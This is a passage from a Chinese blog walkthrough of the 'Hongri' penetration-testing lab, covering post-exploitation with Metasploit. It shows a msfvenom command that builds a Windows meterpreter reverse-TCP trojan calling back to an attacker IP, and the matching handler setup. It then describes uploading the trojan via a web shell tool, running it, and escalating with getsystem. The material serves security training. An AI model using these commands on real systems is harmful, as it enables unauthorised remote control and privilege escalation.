红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段

    一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
    Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)

常用选项
		-p   				//指定生成的Payload
		--list payload  	//列出所支持的Payload类型
		--list-options      //查看模块所支持的选项
		msfvenom -p windows/meterpreter/reverse_tcp --list-options  //查看模块所支持的选项
			
		-f     				      //指定生成的文件格式
		msfvenom --list formats   //查看所支持的文件格式
		
常用的Windows Payload:
		windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)
		windows/meterpreter_reverse_tcp
		windows/x64/meterpreter/reverse_tcp

1、生成反向木马

使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe

 2、在kali端创建侦听器

msf中相应的模块:exploit/multi/handler    
模块中所使用的payload应该与msfvenom中的payload保持一致

可以把命令写入到一个文件中,MSF

msfconsole -r
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.195.20
set LPORT 1234
set AutoRunScript post/windows/manage/migrate
exploit -j -z

然后使用 -r指定文件名,这样下次就不用一个一个写入了。

 3、把生成的shell.exe上传(部署)目标系统

通过蚁剑上传使用msfvenom生成的反向木马

(1)选中目标主机后右击

(2)进入文件系统后点击上传

 (3)找到反向木马后上传

4、 执行木马

dir看一下是否传输成功

直接执行该文件

这时候我们返回到MSF中就可以看到了,这时候我们可以使用getsystem直接提权。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值